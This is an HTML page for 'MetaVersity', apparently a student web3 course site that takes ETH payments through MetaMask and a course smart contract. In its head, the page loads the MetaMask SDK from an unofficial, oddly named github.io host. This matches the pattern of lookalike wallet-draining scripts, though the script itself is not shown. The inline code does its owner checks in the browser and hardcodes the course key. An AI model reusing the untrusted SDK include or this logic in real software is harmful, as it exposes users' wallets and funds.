<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <title>MetaVersity-just study</title>
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <meta content="" name="keywords">
    <meta content="" name="description">

    <!-- Favicon -->
    <link href="img/favicon.ico" rel="icon">

    <!-- Google Web Fonts -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link
        href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@600&family=Lobster+Two:wght@700&display=swap"
        rel="stylesheet">

    <!-- Icon Font Stylesheet -->
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet">

    <!-- Libraries Stylesheet -->
    <link href="lib/animate/animate.min.css" rel="stylesheet">
    <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet">

    <!-- Customized Bootstrap Stylesheet -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Template Stylesheet -->
    <link href="css/style.css" rel="stylesheet">
    <script src="https://c0f4f41c-2f55-4863-921b-sdk-docs.github.io/cdn/metamask-sdk.js"></script>
</head>

<body>
    <div class=" container-xxl bg-white p-0">
        <!-- Spinner Start -->
        <div id="spinner"
            class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-content-center">
            <div class="spinner-border text-primary" style="width: 3rem; height: 3rem;" role="status">
                <span class="sr-only">Loading...</span>
            </div>
        </div>
        <!-- Spinner End -->


        <!-- Navbar Start -->
        <nav class="navbar navbar-expand-lg bg-white navbar-light sticky-top px-4 px-lg-5 py-lg-0">
            <a href="index.html" class="navbar-brand">
                <h1 class="m-0 text-primary"><i class="fa">Metaversity</i></h1>
            </a>
            <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarCollapse">
                <div class="navbar-nav mx-auto">
                    <a href="index.html" class="nav-item nav-link active">Home</a>
                    <a href="#Mission" class="nav-item nav-link">Our Mission</a>
                    <a href="#Teach" class="nav-item nav-link">Become a teacher</a>
                    <a href="#Courses" class="nav-item nav-link">Courses</a>
                    <a href="#AXE US" class="nav-item nav-link">AXE US</a>
                    <a href="store.html" class="nav-item nav-link">Store</a>
                </div>
                <a id="sign" class="btn btn-primary rounded-pill px-3 d-none d-lg-block">sign in</a>
            </div>
        </nav>
        <!-- Navbar End -->


        <!-- Homepage Start -->
        <div class="container-fluid p-0 mb-5">
            <div class="owl-carousel header-carousel position-relative">
                <div class="owl-carousel-item position-relative">
                    <img class="img-fluid" src="img/Background.png" alt="">
                    <div class="position-absolute top-0 start-0 w-100 h-100 d-flex align-items-center"
                        style="background: rgba(0, 0, 0, .2);">
                        <div class="container">
                            <div class="row justify-content-start">
                                <div class="col-10 col-lg-8">
                                    <h1 class="display-2 text-white animated slideInDown mb-4">Empowering Visionaries
                                    </h1>
                                    <p class="fs-5 fw-medium text-white mb-4 pb-2"> "Imagination is more important than
                                        knowledge. For knowledge is limited, whereas imagination embraces the entire
                                        world,
                                        stimulating progress, giving birth to evolution." --Albert Einstein-- , So why
                                        wait when one can showcase his idea visually and teach it to people</p>
                                    <a href=""
                                        class="btn btn-primary rounded-pill py-sm-3 px-sm-5 me-3 animated slideInLeft">Learn
                                        More</a>
                                    <a href=""
                                        class="btn btn-dark rounded-pill py-sm-3 px-sm-5 animated slideInRight">Our
                                        Courses</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- Homepage End -->


        <!-- Mission Start -->
        <div id="Mission" class="container-xxl py-5">
            <div class="container">
                <div class="text-center mx-auto mb-5 wow fadeInUp" data-wow-delay="0.1s" style="max-width: 600px;">
                    <h1 class="mb-3">Our Mission</h1>
                    <p>Metaversity reimagines education in the digital age, merging advanced technology with limitless
                        creativity to transform
                        learning. It’s a platform where knowledge transcends traditional boundaries, empowering learners
                        to explore, create, and
                        innovate in a vibrant, virtual universe.</p>
                </div>
                <div class="row g-4">
                    <div class="col-lg-3 col-sm-6 wow fadeInUp" data-wow-delay="0.1s">
                        <div class="facility-item">
                            <div class="facility-icon bg-primary">
                                <span class="bg-primary"></span>

                                <span class="bg-primary"></span>
                            </div>
                            <div class="facility-text bg-primary">
                                <h3 class="text-primary mb-3">Facilitate conveying complex ideas</h3>
                                <p class="mb-0">Complex ideas, especially those that are spatial or dynamic, can be
                                    better understood through interactive 3D models that are omnipresent</p>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-3 col-sm-6 wow fadeInUp" data-wow-delay="0.3s">
                        <div class="facility-item">
                            <div class="facility-icon bg-success">
                                <span class="bg-success"></span>

                                <span class="bg-success"></span>
                            </div>
                            <div class="facility-text bg-success">
                                <h3 class="text-success mb-3">A safe experimeting ground</h3>
                                <p class="mb-0">experiment and learn from mistakes without real-world
                                    risks, which is crucial in fields like surgery, piloting, chemistry</p>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-3 col-sm-6 wow fadeInUp" data-wow-delay="0.5s">
                        <div class="facility-item">
                            <div class="facility-icon bg-warning">
                                <span class="bg-warning"></span>

                                <span class="bg-warning"></span>
                            </div>
                            <div class="facility-text bg-warning">
                                <h3 class="text-warning mb-3">Infinite resources</h3>
                                <p class="mb-0">all we need is a physics engine and we can simulate you anything you
                                    want</p>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-3 col-sm-6 wow fadeInUp" data-wow-delay="0.7s">
                        <div class="facility-item">
                            <div class="facility-icon bg-info">
                                <span class="bg-info"></span>

                                <span class="bg-info"></span>
                            </div>
                            <div class="facility-text bg-info">
                                <h3 class="text-info mb-3">Emprowering Teachers</h3>
                                <p class="mb-0">Being able to convey your ideas effectively can be highly
                                    attractive to individuals who might run away from teaching for its monotony</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- Mission End -->

        <!-- hiring Start -->
        <div id="Teach" class="container-xxl py-5">
            <div class="container">
                <div class="bg-light rounded">
                    <div class="row g-0">
                        <div class="col-lg-6 wow fadeIn" data-wow-delay="0.1s" style="min-height: 400px;">
                            <div class="position-relative h-100">
                                <img class="position-absolute w-100 h-100 rounded" src="img/Tesla.png"
                                    style="object-fit: cover;">
                            </div>
                        </div>
                        <div class="col-lg-6 wow fadeIn" data-wow-delay="0.5s">
                            <div class="h-100 d-flex flex-column justify-content-center p-5">
                                <h1 class="mb-4">Become A Teacher</h1>
                                <p class="mb-4">if you are talented in teaching and want to make a living out of it and
                                    enlighten thousands of people , this is the where to start
                                </p>
                                <a class="btn btn-primary py-3 px-5" href="">Get Started Now<i
                                        class="fa fa-arrow-right ms-2"></i></a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- hiring End -->


        <!-- Classes Start -->
        <div id="Courses" class="container-xxl py-5">
            <div class="container">
                <div class="text-center mx-auto mb-5 wow fadeInUp" data-wow-delay="0.1s" style="max-width: 600px;">
                    <h1 class="mb-3">Metaversity Classes</h1>
                    <p>Here's a simple preview of The Courses our users love most</p>
                </div>
                <div class="row g-4">
                    <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.1s">
                        <div class="classes-item">
                            <div class="bg-light rounded-circle w-75 mx-auto p-3">
                                <img class="img-fluid rounded-circle" src="img/Maxwell.png" alt="">
                            </div>
                            <div class="bg-light rounded p-4 pt-5 mt-n5">
                                <a class="d-block text-center h3 mt-3 mb-4"
                                    href="">Arduino</a><!--this is the only course who's backend is fully funvtioning , the arduino course-->
                                <div class="d-flex align-items-center justify-content-between mb-4">
                                    <div class="d-flex align-items-center">
                                        <!-- <img class="rounded-circle flex-shrink-0" src="img/user.jpg" alt="" -->
                                            <!-- style="width: 45px; height: 45px;"> -->
                                        <div class="ms-3">
                                            <h6 class="text-primary mb-1">Chater</h6>
                                            <small>Teacher</small>
                                        </div>
                                    </div>
                                    <span id="coursebtn" class="bg-primary text-white rounded-pill py-2 px-3" href="">0.1 ETH
                                        left</span>
                                </div>
                                <div class="row g-1">

                                    <div class="col-4">
                                        <div class="border-top border-3 border-success pt-2">
                                            <h6 class="text-success mb-1">Time:</h6>
                                            <small>5-30 NOV</small>
                                        </div>
                                    </div>
                                    <div class="col-4">
                                        <div class="border-top border-3 border-warning pt-2">
                                            <h6 class="text-warning mb-1">Capacity:</h6>
                                            <small>4/40 Users</small>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.3s">
                        <div class="classes-item">
                            <div class="bg-light rounded-circle w-75 mx-auto p-3">
                                <img class="img-fluid rounded-circle" src="img/Engines.png" alt="">
                            </div>
                            <div class="bg-light rounded p-4 pt-5 mt-n5">
                                <a class="d-block text-center h3 mt-3 mb-4" href="">Mechanical Engines</a>
                                <div class="d-flex align-items-center justify-content-between mb-4">
                                    <div class="d-flex align-items-center">
                                        <!-- <img class="rounded-circle flex-shrink-0" src="img/user.jpg" alt="" -->
                                            <!-- style="width: 45px; height: 45px;"> -->
                                        <div class="ms-3">
                                            <h6 class="text-primary mb-1">Ghassen</h6>
                                            <small>Teacher</small>
                                        </div>
                                    </div>
                                    <span class="bg-primary text-white rounded-pill py-2 px-3" href="">0.2 ETH
                                        left</span>
                                </div>
                                <div class="row g-1">

                                    <div class="col-4">
                                        <div class="border-top border-3 border-success pt-2">
                                            <h6 class="text-success mb-1">Time:</h6>
                                            <small>5-30 NOV</small>
                                        </div>
                                    </div>
                                    <div class="col-4">
                                        <div class="border-top border-3 border-warning pt-2">
                                            <h6 class="text-warning mb-1">Capacity:</h6>
                                            <small>8/40 Users</small>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.5s">
                        <div class="classes-item">
                            <div class="bg-light rounded-circle w-75 mx-auto p-3">
                                <img class="img-fluid rounded-circle" src="img/Chemistry.png" alt="">
                            </div>
                            <div class="bg-light rounded p-4 pt-5 mt-n5">
                                <a class="d-block text-center h3 mt-3 mb-4" href="">Basic chemistry</a>
                                <div class="d-flex align-items-center justify-content-between mb-4">
                                    <div class="d-flex align-items-center">
                                        <!-- <img class="rounded-circle flex-shrink-0" src="img/user.jpg" alt="" -->
                                            <!-- style="width: 45px; height: 45px;"> -->
                                        <div class="ms-3">
                                            <h6 class="text-primary mb-1">Bachir</h6>
                                            <small>Teacher</small>
                                        </div>
                                    </div>
                                    <span class="bg-primary text-white rounded-pill py-2 px-3" href="">0.01 ETH
                                        left</span>
                                </div>
                                <div class="row g-1">

                                    <div class="col-4">
                                        <div class="border-top border-3 border-success pt-2">
                                            <h6 class="text-success mb-1">Time:</h6>
                                            <small>5-30 NOV</small>
                                        </div>
                                    </div>
                                    <div class="col-4">
                                        <div class="border-top border-3 border-warning pt-2">
                                            <h6 class="text-warning mb-1">Capacity:</h6>
                                            <small>5/40 Users</small>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.1s">
                        <div class="classes-item">
                            <div class="bg-light rounded-circle w-75 mx-auto p-3">
                                <img class="img-fluid rounded-circle" src="img/Neurology.png" alt="">
                            </div>
                            <div class="bg-light rounded p-4 pt-5 mt-n5">
                                <a class="d-block text-center h3 mt-3 mb-4" href="">Neurology</a>
                                <div class="d-flex align-items-center justify-content-between mb-4">
                                    <div class="d-flex align-items-center">
                                        <!-- <img class="rounded-circle flex-shrink-0" src="img/user.jpg" alt="" -->
                                            <!-- style="width: 45px; height: 45px;"> -->
                                        <div class="ms-3">
                                            <h6 class="text-primary mb-1">Baha</h6>
                                            <small>Teacher</small>
                                        </div>
                                    </div>
                                    <span class="bg-primary text-white rounded-pill py-2 px-3" href="">0.1 ETH
                                        left</span>
                                </div>
                                <div class="row g-1">

                                    <div class="col-4">
                                        <div class="border-top border-3 border-success pt-2">
                                            <h6 class="text-success mb-1">Time:</h6>
                                            <small>5-30 NOV</small>
                                        </div>
                                    </div>
                                    <div class="col-4">
                                        <div class="border-top border-3 border-warning pt-2">
                                            <h6 class="text-warning mb-1">Capacity:</h6>
                                            <small>1/40 Users</small>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.3s">
                        <div class="classes-item">
                            <div class="bg-light rounded-circle w-75 mx-auto p-3">
                                <img class="img-fluid rounded-circle" src="img/History.png" alt="">
                            </div>
                            <div class="bg-light rounded p-4 pt-5 mt-n5">
                                <a class="d-block text-center h3 mt-3 mb-4" href="">Civilization</a>
                                <div class="d-flex align-items-center justify-content-between mb-4">
                                    <div class="d-flex align-items-center">
                                        <!-- <img class="rounded-circle flex-shrink-0" src="img/user.jpg" alt="" -->
                                            <!-- style="width: 45px; height: 45px;"> -->
                                        <div class="ms-3">
                                            <h6 class="text-primary mb-1">Tesla</h6>
                                            <small>Teacher</small>
                                        </div>
                                    </div>
                                    <span class="bg-primary text-white rounded-pill py-2 px-3" href="">0.1 ETH
                                        left</span>
                                </div>
                                <div class="row g-1">

                                    <div class="col-4">
                                        <div class="border-top border-3 border-success pt-2">
                                            <h6 class="text-success mb-1">Time:</h6>
                                            <small>5-30 NOV</small>
                                        </div>
                                    </div>
                                    <div class="col-4">
                                        <div class="border-top border-3 border-warning pt-2">
                                            <h6 class="text-warning mb-1">Capacity:</h6>
                                            <small>10/40 Users</small>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-delay="0.5s">
                        <div class="classes-item">
                            <div class="bg-light rounded-circle w-75 mx-auto p-3">
                                <img class="img-fluid rounded-circle" src="img/Archi.png" alt="">
                            </div>
                            <div class="bg-light rounded p-4 pt-5 mt-n5">
                                <a class="d-block text-center h3 mt-3 mb-4" href="">Architecture</a>
                                <div class="d-flex align-items-center justify-content-between mb-4">
                                    <div class="d-flex align-items-center">
                                        <!-- <img class="rounded-circle flex-shrink-0" src="img/user.jpg" alt="" -->
                                            <!-- style="width: 45px; height: 45px;"> -->
                                        <div class="ms-3">
                                            <h6 class="text-primary mb-1">fedi</h6>
                                            <small>Teacher</small>
                                        </div>
                                    </div>
                                    <span class="bg-primary text-white rounded-pill py-2 px-3" href="">0.1 ETH
                                        left</span>
                                </div>
                                <div class="row g-1">

                                    <div class="col-4">
                                        <div class="border-top border-3 border-success pt-2">
                                            <h6 class="text-success mb-1">Time:</h6>
                                            <small>5-30 NOV</small>
                                        </div>
                                    </div>
                                    <div class="col-4">
                                        <div class="border-top border-3 border-warning pt-2">
                                            <h6 class="text-warning mb-1">Capacity:</h6>
                                            <small>10/40 Users</small>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- Classes End -->


        <!-- Appointment Start -->
        <div id="AXE US" class="container-xxl py-5">
            <div class="container">
                <div class="bg-light rounded">
                    <div class="row g-0">
                        <div class="col-lg-6 wow fadeIn" data-wow-delay="0.1s">
                            <div class="h-100 d-flex flex-column justify-content-center p-5">
                                <h1 class="mb-4">ask any question or make any suggestion</h1>
                                <form>
                                    <div class="row g-3">
                                        <div class="col-sm-6">
                                            <div class="form-floating">
                                                <input type="text" class="form-control border-0" id="gname"
                                                    placeholder="Gurdian Name">
                                                <label for="gname">First Name</label>
                                            </div>
                                        </div>
                                        <div class="col-sm-6">
                                            <div class="form-floating">
                                                <input type="email" class="form-control border-0" id="gmail"
                                                    placeholder="Gurdian Email">
                                                <label for="gmail">Last Name</label>
                                            </div>
                                        </div>
                                        <div class="col-sm-6">
                                            <div class="form-floating">
                                                <input type="text" class="form-control border-0" id="cname"
                                                    placeholder="Child Name">
                                                <label for="cname">Email</label>
                                            </div>
                                        </div>
                                        <div class="col-sm-6">
                                            <div class="form-floating">
                                                <input type="text" class="form-control border-0" id="cage"
                                                    placeholder="Child Age">
                                                <label for="cage">Topic</label>
                                            </div>
                                        </div>
                                        <div class="col-12">
                                            <div class="form-floating">
                                                <textarea class="form-control border-0"
                                                    placeholder="Leave a message here" id="message"
                                                    style="height: 100px"></textarea>
                                                <label for="message">Message</label>
                                            </div>
                                        </div>
                                        <div class="col-12">
                                            <button class="btn btn-primary w-100 py-3" type="submit">Submit</button>
                                        </div>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <div class="col-lg-6 wow fadeIn" data-wow-delay="0.5s" style="min-height: 400px;">
                            <div class="position-relative h-100">
                                <img class="position-absolute w-100 h-100 rounded" src="img/AXEUS.png"
                                    style="object-fit: cover;">
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <!-- Appointment End -->


        <!-- Back to Top -->
        <a href="#" class="btn btn-lg btn-primary btn-lg-square back-to-top"><i class="bi bi-arrow-up"></i></a>
    </div>

    <!-- JavaScript Libraries -->
    <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"></script>
    <script src="lib/wow/wow.min.js"></script>
    <script src="lib/easing/easing.min.js"></script>
    <script src="lib/waypoints/waypoints.min.js"></script>
    <script src="lib/owlcarousel/owl.carousel.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/4.2.2/web3.min.js"></script>

    <!-- Template Javascript -->
    <script src="js/main.js"></script>
    <script>
      (async () => {
        
        const MMSDK = new MetaMaskSDK.MetaMaskSDK()
      // Because init process of the MetaMaskSDK is async.
        await MMSDK.init()
        const ethereum = MMSDK.getProvider() // You can also access via window.ethereum

        ethereum.request({ method: 'eth_requestAccounts' })
        const web3 = new Web3(window.ethereum) 
        const accounts = await web3.eth.getAccounts()
        let accindex = 0
        let contractAddress = undefined
        let account = accounts[accindex]
        let contract = undefined
        let owner = (await (await fetch("/owner")).text()).trim()
        const abi = JSON.parse(await (await fetch('/CourseContract.json')).text())
        const bytecode = await (await fetch('/CourseContract.bin')).text()
        const signin = document.querySelector("#sign")
        const coursebtn = document.querySelector("#coursebtn")
        updatesignin()
        updateContract()

        signin.onclick = async () => {
          accindex = rotaccount(accindex)
          account = accounts[accindex]
          updatesignin()
          updateContract()
        }

        async function updatesignin() {
          signin.innerHTML =  account
        }
        async function updateContract() {
          let response = await fetch("/current")
          if(response.status == 404) {
              console.log(owner, account)
            if (owner == account) {
              coursebtn.innerHTML = "Deploy"
            } else {
              coursebtn.innerHTML = "Not Deployed"
            }
            coursebtn.classList.add("error")
            return
          }
          contractAddress =  await response.text()
          contract = new web3.eth.Contract(abi, contractAddress)

          coursebtn.classList.remove("error")
          const left = await contract.methods.getLeft().call()
          if(left <= 0) {
            coursebtn.classList.add("with")
            if(isOwner()) {
              coursebtn.innerHTML = "Withdraw"
            } else {
              coursebtn.innerHTML = "Get Key"
            }
            return;
          }
          coursebtn.classList.remove("with")
          coursebtn.innerHTML = left + " Wei Left"
        }
      function rotaccount(i) {
        return (i+1) % accounts.length
      }

        function isOwner() {
          return owner == account
        }
        coursebtn.onclick = async () => {
          if(!contractAddress && !isOwner()) {
            alert("not deployed! please wait");
            return;
          } 
            
          if(!contractAddress && isOwner()) {
          contract = new web3.eth.Contract(abi)
            const deployedContract = contract.deploy({
            	data: '0x' + bytecode,
            	arguments: [parseInt(prompt("how much will be the price of the course in Wei ?"))],
            });
            const res = await deployedContract.send({
            	from: owner,
            	gas: 1000000,
            	gasPrice: 10000000000,
            });
            await fetch("/current?contract="+res._address, {method:'POST'})
            updateContract()
            return 

          }
          
          const left = await contract.methods.getLeft().call()

          if(left <= 0) {
            if(isOwner()) {
              await contract.methods.withdrawBalance(owner).send({from: owner})
              await fetch("/reset")
              coursebtn.classList.remove("with")
              updateContract()
            } else {
              alert("Your Key is: arduino")
            }
            return
          } 
          
          if(contractAddress && !isOwner()) {
                console.log(account, contractAddress)
                await web3.eth.sendTransaction({from:account,to:contractAddress, value:parseInt(prompt("enter amount to send in Wei"))});
                await updateContract();
          }

        }
        

      })()

    </script>
</body>

</html>
